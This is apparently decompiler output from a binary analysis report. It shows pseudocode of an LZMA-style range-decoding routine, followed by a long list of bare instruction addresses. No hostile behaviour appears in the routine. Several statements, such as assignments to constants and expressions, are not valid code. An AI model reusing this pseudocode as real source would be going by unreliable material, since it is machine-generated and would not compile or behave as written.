								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                                                                              0x00405f92
                                                                                                                              0x00405f99
                                                                                                                              0x00405f9f
                                                                                                                              0x00405fa5
                                                                                                                              0x00000000
                                                                                                                              0x00405fa9
                                                                                                                              0x00405fb5
                                                                                                                              0x00405fb5
                                                                                                                              0x00405fb5
                                                                                                                              0x00405fbe
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405fc4
                                                                                                                              0x00000000
                                                                                                                              0x00405fcb
                                                                                                                              0x00405fcf
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405fd8
                                                                                                                              0x00405fdb
                                                                                                                              0x00405fde
                                                                                                                              0x00405fe0
                                                                                                                              0x00405fe2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405fe8
                                                                                                                              0x00405feb
                                                                                                                              0x00405fed
                                                                                                                              0x00405fee
                                                                                                                              0x00405ff1
                                                                                                                              0x00405ff3
                                                                                                                              0x00405ff4
                                                                                                                              0x00405ff6
                                                                                                                              0x00405ff9
                                                                                                                              0x00405ffe
                                                                                                                              0x00406003
                                                                                                                              0x0040600c
                                                                                                                              0x0040601f
                                                                                                                              0x00406022
                                                                                                                              0x0040602b
                                                                                                                              0x0040602e
                                                                                                                              0x00406056
                                                                                                                              0x00406056
                                                                                                                              0x00406058
                                                                                                                              0x00406066
                                                                                                                              0x00406066
                                                                                                                              0x0040606a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040605a
                                                                                                                              0x0040605a
                                                                                                                              0x0040605d
                                                                                                                              0x0040605d
                                                                                                                              0x0040605e
                                                                                                                              0x0040605e
                                                                                                                              0x00000000
                                                                                                                              0x0040605a
                                                                                                                              0x00406030
                                                                                                                              0x00406034
                                                                                                                              0x00406039
                                                                                                                              0x00406039
                                                                                                                              0x00406042
                                                                                                                              0x00406048
                                                                                                                              0x0040604a
                                                                                                                              0x0040604d
                                                                                                                              0x00000000
                                                                                                                              0x00406053
                                                                                                                              0x00406053
                                                                                                                              0x00000000
                                                                                                                              0x00406053
                                                                                                                              0x00000000
                                                                                                                              0x00406070
                                                                                                                              0x00406070
                                                                                                                              0x00406074
                                                                                                                              0x00406920
                                                                                                                              0x00000000
                                                                                                                              0x00406920
                                                                                                                              0x0040607d
                                                                                                                              0x0040608d
                                                                                                                              0x00406090
                                                                                                                              0x00406093
                                                                                                                              0x00406093
                                                                                                                              0x00406093
                                                                                                                              0x00406096
                                                                                                                              0x00406096
                                                                                                                              0x0040609a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040609c
                                                                                                                              0x0040609f
                                                                                                                              0x004060a2
                                                                                                                              0x004060cc
                                                                                                                              0x004060d2
                                                                                                                              0x004060d9
                                                                                                                              0x00000000
                                                                                                                              0x004060d9
                                                                                                                              0x004060a4
                                                                                                                              0x004060a8
                                                                                                                              0x004060ab
                                                                                                                              0x004060b0
                                                                                                                              0x004060b0
                                                                                                                              0x004060bb
                                                                                                                              0x004060c1
                                                                                                                              0x004060c3
                                                                                                                              0x004060c6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040610b
                                                                                                                              0x00406111
                                                                                                                              0x00406114
                                                                                                                              0x00406121
                                                                                                                              0x00406129
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004060e0
                                                                                                                              0x004060e0
                                                                                                                              0x004060e4
                                                                                                                              0x0040692f
                                                                                                                              0x00000000
                                                                                                                              0x0040692f
                                                                                                                              0x004060f0
                                                                                                                              0x004060fb
                                                                                                                              0x004060fb
                                                                                                                              0x004060fb
                                                                                                                              0x004060fe
                                                                                                                              0x00406101
                                                                                                                              0x00406104
                                                                                                                              0x00406107
                                                                                                                              0x00406109
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004067a0
                                                                                                                              0x004067a0
                                                                                                                              0x004067a6
                                                                                                                              0x004067ac
                                                                                                                              0x004067af
                                                                                                                              0x004067b2
                                                                                                                              0x004067cc
                                                                                                                              0x004067cf
                                                                                                                              0x004067d5
                                                                                                                              0x004067e0
                                                                                                                              0x004067e0
                                                                                                                              0x004067e2
                                                                                                                              0x004067b4
                                                                                                                              0x004067b4
                                                                                                                              0x004067c3
                                                                                                                              0x004067c7
                                                                                                                              0x004067c7
                                                                                                                              0x004067e5
                                                                                                                              0x004067ec
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004067ee
                                                                                                                              0x004067ee
                                                                                                                              0x004067f2
                                                                                                                              0x004069a1
                                                                                                                              0x00000000
                                                                                                                              0x004069a1
                                                                                                                              0x004067fe
                                                                                                                              0x00406805
                                                                                                                              0x0040680d
                                                                                                                              0x0040680d
                                                                                                                              0x0040680d
                                                                                                                              0x00406810
                                                                                                                              0x00406813
                                                                                                                              0x00406813
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406131
                                                                                                                              0x00406133
                                                                                                                              0x00406136
                                                                                                                              0x004061a7
                                                                                                                              0x004061aa
                                                                                                                              0x004061ad
                                                                                                                              0x004061b4
                                                                                                                              0x004061be
                                                                                                                              0x00000000
                                                                                                                              0x004061be
                                                                                                                              0x00406138
                                                                                                                              0x0040613c
                                                                                                                              0x0040613f
                                                                                                                              0x00406141
                                                                                                                              0x00406144
                                                                                                                              0x00406147
                                                                                                                              0x00406149
                                                                                                                              0x0040614c
                                                                                                                              0x0040614e
                                                                                                                              0x00406153
                                                                                                                              0x00406156
                                                                                                                              0x00406159
                                                                                                                              0x0040615d
                                                                                                                              0x00406164
                                                                                                                              0x00406167
                                                                                                                              0x0040616e
                                                                                                                              0x00406172
                                                                                                                              0x0040617a
                                                                                                                              0x0040617a
                                                                                                                              0x0040617a
                                                                                                                              0x00406174
                                                                                                                              0x00406174
                                                                                                                              0x00406174
                                                                                                                              0x00406169
                                                                                                                              0x00406169
                                                                                                                              0x00406169
                                                                                                                              0x0040617e
                                                                                                                              0x00406181
                                                                                                                              0x0040619f
                                                                                                                              0x004061a1
                                                                                                                              0x00000000
                                                                                                                              0x004061a1
                                                                                                                              0x00406183
                                                                                                                              0x00406186
                                                                                                                              0x00406189
                                                                                                                              0x0040618c
                                                                                                                              0x0040618e
                                                                                                                              0x0040618e
                                                                                                                              0x0040618e
                                                                                                                              0x00406191
                                                                                                                              0x00406194
                                                                                                                              0x00406196
                                                                                                                              0x00406197
                                                                                                                              0x0040619a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004063d0
                                                                                                                              0x004063d4
                                                                                                                              0x004063f2
                                                                                                                              0x004063f5
                                                                                                                              0x004063fc
                                                                                                                              0x004063ff
                                                                                                                              0x00406402
                                                                                                                              0x00406405
                                                                                                                              0x00406408
                                                                                                                              0x0040640b
                                                                                                                              0x0040640d
                                                                                                                              0x00406414
                                                                                                                              0x00406415
                                                                                                                              0x00406417
                                                                                                                              0x0040641a
                                                                                                                              0x0040641d
                                                                                                                              0x00406420
                                                                                                                              0x00406420
                                                                                                                              0x00406425
                                                                                                                              0x00000000
                                                                                                                              0x00406425
                                                                                                                              0x004063d6
                                                                                                                              0x004063d9
                                                                                                                              0x004063dc
                                                                                                                              0x004063e6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040643a
                                                                                                                              0x0040643e
                                                                                                                              0x00406461
                                                                                                                              0x00406464
                                                                                                                              0x00406467
                                                                                                                              0x00406471
                                                                                                                              0x00406440
                                                                                                                              0x00406440
                                                                                                                              0x00406443
                                                                                                                              0x00406446
                                                                                                                              0x00406449
                                                                                                                              0x00406456
                                                                                                                              0x00406459
                                                                                                                              0x00406459
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040647d
                                                                                                                              0x00406481
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406487
                                                                                                                              0x0040648b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406491
                                                                                                                              0x00406493
                                                                                                                              0x00406497
                                                                                                                              0x00406497
                                                                                                                              0x0040649a
                                                                                                                              0x0040649e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004064ee
                                                                                                                              0x004064f2
                                                                                                                              0x004064f9
                                                                                                                              0x004064fc
                                                                                                                              0x004064ff
                                                                                                                              0x00406509
                                                                                                                              0x00000000
                                                                                                                              0x00406509
                                                                                                                              0x004064f4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406515
                                                                                                                              0x00406519
                                                                                                                              0x00406520
                                                                                                                              0x00406523
                                                                                                                              0x00406526
                                                                                                                              0x0040651b
                                                                                                                              0x0040651b
                                                                                                                              0x0040651b
                                                                                                                              0x00406529
                                                                                                                              0x0040652c
                                                                                                                              0x0040652f
                                                                                                                              0x0040652f
                                                                                                                              0x00406532
                                                                                                                              0x00406535
                                                                                                                              0x00406538
                                                                                                                              0x00406538
                                                                                                                              0x0040653b
                                                                                                                              0x00406542
                                                                                                                              0x00406547
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004065d5
                                                                                                                              0x004065d5
                                                                                                                              0x004065d9
                                                                                                                              0x00406977
                                                                                                                              0x00000000
                                                                                                                              0x00406977
                                                                                                                              0x004065df
                                                                                                                              0x004065e2
                                                                                                                              0x004065e5
                                                                                                                              0x004065e9
                                                                                                                              0x004065ec
                                                                                                                              0x004065f2
                                                                                                                              0x004065f4
                                                                                                                              0x004065f4
                                                                                                                              0x004065f4
                                                                                                                              0x004065f7
                                                                                                                              0x004065fa
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004061ca
                                                                                                                              0x004061ca
                                                                                                                              0x004061ce
                                                                                                                              0x0040693b
                                                                                                                              0x00000000
                                                                                                                              0x0040693b
                                                                                                                              0x004061d4
                                                                                                                              0x004061d7
                                                                                                                              0x004061da
                                                                                                                              0x004061de
                                                                                                                              0x004061e1
                                                                                                                              0x004061e7
                                                                                                                              0x004061e9
                                                                                                                              0x004061e9
                                                                                                                              0x004061e9
                                                                                                                              0x004061ec
                                                                                                                              0x004061ef
                                                                                                                              0x004061ef
                                                                                                                              0x004061f2
                                                                                                                              0x004061f5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004061fb
                                                                                                                              0x00406201
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406207
                                                                                                                              0x00406207
                                                                                                                              0x0040620b
                                                                                                                              0x0040620e
                                                                                                                              0x00406211
                                                                                                                              0x00406214
                                                                                                                              0x00406217
                                                                                                                              0x00406218
                                                                                                                              0x0040621b
                                                                                                                              0x0040621d
                                                                                                                              0x00406223
                                                                                                                              0x00406226
                                                                                                                              0x00406229
                                                                                                                              0x0040622c
                                                                                                                              0x0040622f
                                                                                                                              0x00406232
                                                                                                                              0x00406235
                                                                                                                              0x00406251
                                                                                                                              0x00406254
                                                                                                                              0x00406257
                                                                                                                              0x0040625a
                                                                                                                              0x00406261
                                                                                                                              0x00406265
                                                                                                                              0x00406267
                                                                                                                              0x0040626b
                                                                                                                              0x00406237
                                                                                                                              0x00406237
                                                                                                                              0x0040623b
                                                                                                                              0x00406243
                                                                                                                              0x00406248
                                                                                                                              0x0040624a
                                                                                                                              0x0040624c
                                                                                                                              0x0040624c
                                                                                                                              0x0040626e
                                                                                                                              0x00406275
                                                                                                                              0x00406278
                                                                                                                              0x00000000
                                                                                                                              0x0040627e
                                                                                                                              0x00000000
                                                                                                                              0x0040627e
                                                                                                                              0x00000000
                                                                                                                              0x00406283
                                                                                                                              0x00406283
                                                                                                                              0x00406287
                                                                                                                              0x00406947
                                                                                                                              0x00000000
                                                                                                                              0x00406947
                                                                                                                              0x0040628d
                                                                                                                              0x00406290
                                                                                                                              0x00406293
                                                                                                                              0x00406297
                                                                                                                              0x0040629a
                                                                                                                              0x004062a0
                                                                                                                              0x004062a2
                                                                                                                              0x004062a2
                                                                                                                              0x004062a2
                                                                                                                              0x004062a5
                                                                                                                              0x004062a8
                                                                                                                              0x004062a8
                                                                                                                              0x004062a8
                                                                                                                              0x004062ae
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004062b0
                                                                                                                              0x004062b3
                                                                                                                              0x004062b6
                                                                                                                              0x004062b9
                                                                                                                              0x004062bc
                                                                                                                              0x004062bf
                                                                                                                              0x004062c2
                                                                                                                              0x004062c5
                                                                                                                              0x004062c8
                                                                                                                              0x004062cb
                                                                                                                              0x004062ce
                                                                                                                              0x004062e6
                                                                                                                              0x004062e9
                                                                                                                              0x004062ec
                                                                                                                              0x004062ef
                                                                                                                              0x004062ef
                                                                                                                              0x004062f2
                                                                                                                              0x004062f6
                                                                                                                              0x004062f8
                                                                                                                              0x004062d0
                                                                                                                              0x004062d0
                                                                                                                              0x004062d8
                                                                                                                              0x004062dd
                                                                                                                              0x004062df
                                                                                                                              0x004062e1
                                                                                                                              0x004062e1
                                                                                                                              0x004062fb
                                                                                                                              0x00406302
                                                                                                                              0x00406305
                                                                                                                              0x00000000
                                                                                                                              0x00406307
                                                                                                                              0x00000000
                                                                                                                              0x00406307
                                                                                                                              0x00406305
                                                                                                                              0x0040630c
                                                                                                                              0x0040630c
                                                                                                                              0x0040630c
                                                                                                                              0x0040630c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406347
                                                                                                                              0x00406347
                                                                                                                              0x0040634b
                                                                                                                              0x00406953
                                                                                                                              0x00000000
                                                                                                                              0x00406953
                                                                                                                              0x00406351
                                                                                                                              0x00406354
                                                                                                                              0x00406357
                                                                                                                              0x0040635b
                                                                                                                              0x0040635e
                                                                                                                              0x00406364
                                                                                                                              0x00406366
                                                                                                                              0x00406366
                                                                                                                              0x00406366
                                                                                                                              0x00406369
                                                                                                                              0x0040636c
                                                                                                                              0x0040636c
                                                                                                                              0x00406372
                                                                                                                              0x00406310
                                                                                                                              0x00406310
                                                                                                                              0x00406313
                                                                                                                              0x00000000
                                                                                                                              0x00406313
                                                                                                                              0x00406374
                                                                                                                              0x00406374
                                                                                                                              0x00406377
                                                                                                                              0x0040637a
                                                                                                                              0x0040637d
                                                                                                                              0x00406380
                                                                                                                              0x00406383
                                                                                                                              0x00406386
                                                                                                                              0x00406389
                                                                                                                              0x0040638c
                                                                                                                              0x0040638f
                                                                                                                              0x00406392
                                                                                                                              0x004063aa
                                                                                                                              0x004063ad
                                                                                                                              0x004063b0
                                                                                                                              0x004063b3
                                                                                                                              0x004063b3
                                                                                                                              0x004063b6
                                                                                                                              0x004063ba
                                                                                                                              0x004063bc
                                                                                                                              0x00406394
                                                                                                                              0x00406394
                                                                                                                              0x0040639c
                                                                                                                              0x004063a1
                                                                                                                              0x004063a3
                                                                                                                              0x004063a5
                                                                                                                              0x004063a5
                                                                                                                              0x004063bf
                                                                                                                              0x004063c6
                                                                                                                              0x004063c9
                                                                                                                              0x00000000
                                                                                                                              0x004063cb
                                                                                                                              0x00000000
                                                                                                                              0x004063cb
                                                                                                                              0x00000000
                                                                                                                              0x00406658
                                                                                                                              0x00406658
                                                                                                                              0x0040665c
                                                                                                                              0x00406983
                                                                                                                              0x00000000
                                                                                                                              0x00406983
                                                                                                                              0x00406662
                                                                                                                              0x00406665
                                                                                                                              0x00406668
                                                                                                                              0x0040666c
                                                                                                                              0x0040666f
                                                                                                                              0x00406675
                                                                                                                              0x00406677
                                                                                                                              0x00406677
                                                                                                                              0x00406677
                                                                                                                              0x0040667a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406428
                                                                                                                              0x00406428
                                                                                                                              0x0040642b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406767
                                                                                                                              0x0040676b
                                                                                                                              0x0040678d
                                                                                                                              0x00406790
                                                                                                                              0x0040679a
                                                                                                                              0x0040679d
                                                                                                                              0x0040679d
                                                                                                                              0x00000000
                                                                                                                              0x0040679d
                                                                                                                              0x0040676d
                                                                                                                              0x00406770
                                                                                                                              0x00406774
                                                                                                                              0x00406777
                                                                                                                              0x00406777
                                                                                                                              0x0040677a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406824
                                                                                                                              0x00406828
                                                                                                                              0x00406846
                                                                                                                              0x00406846
                                                                                                                              0x00406846
                                                                                                                              0x0040684d
                                                                                                                              0x00406854
                                                                                                                              0x0040685b
                                                                                                                              0x0040685b
                                                                                                                              0x00000000
                                                                                                                              0x0040685b
                                                                                                                              0x0040682a
                                                                                                                              0x0040682d
                                                                                                                              0x00406830
                                                                                                                              0x00406833
                                                                                                                              0x0040683a
                                                                                                                              0x0040677e
                                                                                                                              0x0040677e
                                                                                                                              0x00406781
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406915
                                                                                                                              0x00406918
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040654f
                                                                                                                              0x00406551
                                                                                                                              0x00406558
                                                                                                                              0x00406559
                                                                                                                              0x0040655b
                                                                                                                              0x0040655e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406566
                                                                                                                              0x00406569
                                                                                                                              0x0040656c
                                                                                                                              0x0040656e
                                                                                                                              0x00406570
                                                                                                                              0x00406570
                                                                                                                              0x00406571
                                                                                                                              0x00406574
                                                                                                                              0x0040657b
                                                                                                                              0x0040657e
                                                                                                                              0x0040658c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406862
                                                                                                                              0x00406862
                                                                                                                              0x00406865
                                                                                                                              0x0040686c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406871
                                                                                                                              0x00406871
                                                                                                                              0x00406875
                                                                                                                              0x004069ad
                                                                                                                              0x00000000
                                                                                                                              0x004069ad
                                                                                                                              0x0040687b
                                                                                                                              0x0040687e
                                                                                                                              0x00406881
                                                                                                                              0x00406885
                                                                                                                              0x00406888
                                                                                                                              0x0040688e
                                                                                                                              0x00406890
                                                                                                                              0x00406890
                                                                                                                              0x00406890
                                                                                                                              0x00406893
                                                                                                                              0x00406896
                                                                                                                              0x00406896
                                                                                                                              0x00406896
                                                                                                                              0x00406896
                                                                                                                              0x00406899
                                                                                                                              0x00406899
                                                                                                                              0x0040689d
                                                                                                                              0x004068fd
                                                                                                                              0x00406900
                                                                                                                              0x00406905
                                                                                                                              0x00406906
                                                                                                                              0x00406908
                                                                                                                              0x0040690a
                                                                                                                              0x0040690d
                                                                                                                              0x00406819
                                                                                                                              0x00406819
                                                                                                                              0x00000000
                                                                                                                              0x00406819
                                                                                                                              0x0040689f
                                                                                                                              0x004068a5
                                                                                                                              0x004068a8
                                                                                                                              0x004068ab
                                                                                                                              0x004068ae
                                                                                                                              0x004068b1
                                                                                                                              0x004068b4
                                                                                                                              0x004068b7
                                                                                                                              0x004068ba
                                                                                                                              0x004068bd
                                                                                                                              0x004068c0
                                                                                                                              0x004068d9
                                                                                                                              0x004068dc
